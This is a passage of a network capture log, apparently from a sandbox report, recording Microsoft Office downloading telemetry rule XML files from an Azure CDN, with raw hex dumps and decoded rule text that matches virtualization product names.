xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	49825	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:08 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:08 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:08 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: faae3217-b01e-0001-2d02-2f46e2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031308Z-17df447cdb57g7m7hC1DFW791s00000003t0000000006dar x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:08 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	49824	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:08 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:08 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:08 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 1572e0e4-b01e-003e-1a0c-2d8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031308Z-16547b76f7f9bs6dhC1DFWt3rg00000007e000000000q3q8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:08 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	49826	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:08 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:09 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:09 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: d55876ee-301e-0099-5603-2d6683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031309Z-16547b76f7fkj7j4hC1DFW0a9g00000007fg00000000hrkq x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:09 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	49828	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:09 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:09 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:09 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 162cf1ac-401e-002a-0c09-2dc62e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031309Z-16547b76f7f7jnp2hC1DFWfc3000000007n000000000a0q5 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:09 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	49827	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:09 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:09 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:09 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: d78e503f-301e-0051-317b-3038bb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031309Z-17df447cdb528ltlhC1DFWnt1c00000003gg00000000p41x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:09 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	49829	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:09 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:09 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:09 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 6dc34679-101e-0034-7d01-2d96ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031309Z-16547b76f7fp46ndhC1DFW66zg00000007gg00000000ny03 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:09 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	49830	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:09 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:09 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:09 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 1bd0cbd6-f01e-003c-2a58-2e8cf0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031309Z-17df447cdb54ntx4hC1DFW2k4000000003t00000000097fb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:09 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	49831	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:09 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:10 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:09 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: fdad5187-a01e-001e-6d5f-2e49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031309Z-17df447cdb528ltlhC1DFWnt1c00000003n000000000aqct x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:10 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	49832	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:10 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:10 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:10 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: ea775dbe-901e-0016-4f03-2defe9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031310Z-16547b76f7fkj7j4hC1DFW0a9g00000007k0000000009ybv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:10 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	49835	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:10 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:10 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:10 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 1f4a5a54-701e-0032-477b-30a540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031310Z-17df447cdb5qkskwhC1DFWeeg400000003s000000000rpq8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:10 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	49833	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:10 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:10 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:10 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: dd167dad-801e-008f-4af3-2e2c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031310Z-17df447cdb5rrj6shC1DFW6qg400000003r0000000005n6z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:10 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	49834	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:10 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:10 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:10 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 4b06b021-701e-000d-6755-2e6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031310Z-17df447cdb5vq4m4hC1DFWrbp800000003m000000000m72k x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
